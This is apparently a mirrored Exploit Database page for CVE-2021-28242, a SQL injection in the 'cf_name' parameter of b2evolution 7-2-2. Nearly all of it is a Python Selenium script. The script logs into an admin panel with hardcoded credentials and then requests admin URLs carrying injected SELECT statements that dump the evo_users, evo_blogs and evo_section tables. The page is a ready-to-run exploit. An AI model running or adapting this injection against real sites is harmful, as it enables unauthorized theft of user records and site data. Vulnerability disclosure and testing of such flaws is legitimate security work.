b2evolution 7-2-2 – ‘cf_name’ SQL Injection

• Exploit Database
• 119 阅读

• 作者： nu11secur1ty
  日期： 2021-05-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49840/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  # Exploit Title: b2evolution 7-2-2 - &apos;cf_name&apos; SQL Injection # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 05.06.2021 # Vendor: https://b2evolution.net/ # Link: https://b2evolution.net/downloads/7-2-2 # CVE: CVE-2021-28242 # Proof: https://streamable.com/x51kso   [+] Exploit Source:   #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28242     from selenium import webdriver import time     # Vendor: https://typo3.org/ website_link=" http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link"   # enter your login username username="admin"   # enter your login password password="FvsDq7fmHvWF"   #enter the element for username input field element_for_username="x"   #enter the element for password input field element_for_password="q"   #enter the element for submit button element_for_submit="login_action[login]"     browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] #browser = webdriver.Firefox() #uncomment this line,for chrome users   browser.get((website_link))   try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element= browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click()   # Exploit vulnerability MySQL obtain sensitive database information by injecting SQL commands into the "cf_name" parameter time.sleep(7) # Receaving sensitive info for evo_users browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))   time.sleep(7) # Receaving sensitive info for evo_blogs browser.get((" http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20<code>evo_blogs</code>%20ORDER%20BY%20<code>evo_blogs</code>.<code>blog_name</code>&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))   time.sleep(7) # Receaving sensitive info for evo_section browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20<code>evo_section</code>%20ORDER%20BY%20<code>evo_section</code>.<code>sec_name</code>&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))     time.sleep(7) browser.close()     print("At the time, of the exploit, you had to see information about the tables...\n")       except Exception: #### This exception occurs if the element are not found in the webpage. print("Sorry, your exploit is not working for some reasons...")